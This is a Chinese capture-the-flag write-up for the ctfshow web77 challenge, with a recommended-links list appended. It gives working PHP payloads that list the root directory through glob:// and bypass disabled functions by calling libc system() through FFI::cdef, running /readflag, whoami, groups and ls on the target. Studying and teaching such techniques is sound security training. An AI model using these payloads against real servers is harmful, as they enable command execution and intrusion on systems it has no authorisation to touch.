[ctfshow web入门] web77

信息收集

上一题的读取flag方式不能用了,使用后的回显是:could not find driver

解题

同样的查目录方法

php 复制代码
c=var_export(scandir("glob:///*"));die();
php 复制代码
c=foreach(new DirectoryIterator("glob:///*") as $a){
    echo($a->__toString().' ');
}
ob_flush();
php 复制代码
c=if ( $a = opendir("glob:///*") ) {
    while ( ($file = readdir($a)) !== false ) {
        echo $file."<br>";
    }
    closedir($a);
    exit();
}

读取flag

关于FFI的博客:PHP7.4 FFI 扩展安全问题

我只说FFI:cdef的一些结论:

php7.4才有

第二个参数可以缺省,缺省时大多情况下也能找到对应函数,有点类似于C的GetProcAddress

这个被调用的C函数由于没有写权限,前端没有回显

php 复制代码
public static FFI::cdef(string $code = "", ?string $lib = null): FFI

最终答案

php 复制代码
c=$ffi=FFI::cdef("int system(const char *command);");
$ffi->system('/readflag > 2.txt');die();

其中readflag是可执行文件,不是flag,所以执行/readflag后将结果输出到2.txt,就能拿到flag

由于没有目录穿透的手段了,只能复制到当前目录进行读取,可以使用include或是readgzfile啥的,都不影响

尝试过程

php 复制代码
c=$ffi=FFI::cdef("int system(const char *command);");
$ffi->system('cp /flag36x.txt > 1.txt');
$ffi->system('cp /readflag 2.txt');die();

1.txt没有内容,2.txt是个ELF文件,开头有个ELF字样,就像windows可执行文件PE文件开头有MZ字样,图片文件开头也有PNG等能标识文件格式的字样。

这是一段伪C代码,因为这是从硬编码翻译过来的,与原来的C代码可能有所出入

使用uid设置为管理员权限

puts输出一段字符串

执行system("cat /flag36x.txt"),这和php中的代码效果相同

猜测/flag36x.txt只有管理员能读

执行下面命令查看文件属性

php 复制代码
c=$ffi=FFI::cdef("int system(const char *command);");
$ffi->system('ls / -al > ls.txt');exit();

关于权限,看博客:Linux:文件权限详解及修改方法

看权限分类即可

php 复制代码
c=$ffi=FFI::cdef("int system(const char *command);");
$ffi->system('whoami > who.txt');exit();

打开who.txt得到我们是www-data

php 复制代码
c=$ffi=FFI::cdef("int system(const char *command);");
$ffi->system('groups www-data > groups.txt');exit();

groups.txt得到www-data : www-data,显然我们不属于管理员用户组

而flag36x.txt的权限是拥有者可读所属用户组可读 ,我们不满足,无法读取

如果尝试复制这个文件就会提示如下错误

shell 复制代码
cp: missing destination file operand after '/flag36x.txt'
Try 'cp --help' for more information.

下一章就是web118
web76    目录    web118

相关推荐
不知名raver(学python版)5 分钟前
npm ERR! code ELIFECYCLE npm ERR! errno 1 npm ERR!
前端·npm·node.js
醉方休16 分钟前
React中使用DDD(领域驱动设计)
前端·react.js·前端框架
excel21 分钟前
📖 小说网站的预导航实战:link 预加载 + fetch + 前进后退全支持
前端
学习3人组25 分钟前
React 样式隔离核心方法和最佳实践
前端·react.js·前端框架
世伟爱吗喽31 分钟前
threejs入门学习日记
前端·javascript·three.js
朝阳58144 分钟前
用 Rust + Actix-Web 打造“Hello, WebSocket!”——从握手到回声,只需 50 行代码
前端·websocket·rust
F2E_Zhangmo44 分钟前
基于cornerstone3D的dicom影像浏览器 第五章 在Displayer四个角落显示信息
开发语言·前端·javascript
slim~1 小时前
javaweb基础第一天总结(HTML-CSS)
前端·css·html
筑梦之月1 小时前
3分钟解决ZAP打开浏览器闪退问题
web安全
一支鱼1 小时前
leetcode常用解题方案总结
前端·算法·leetcode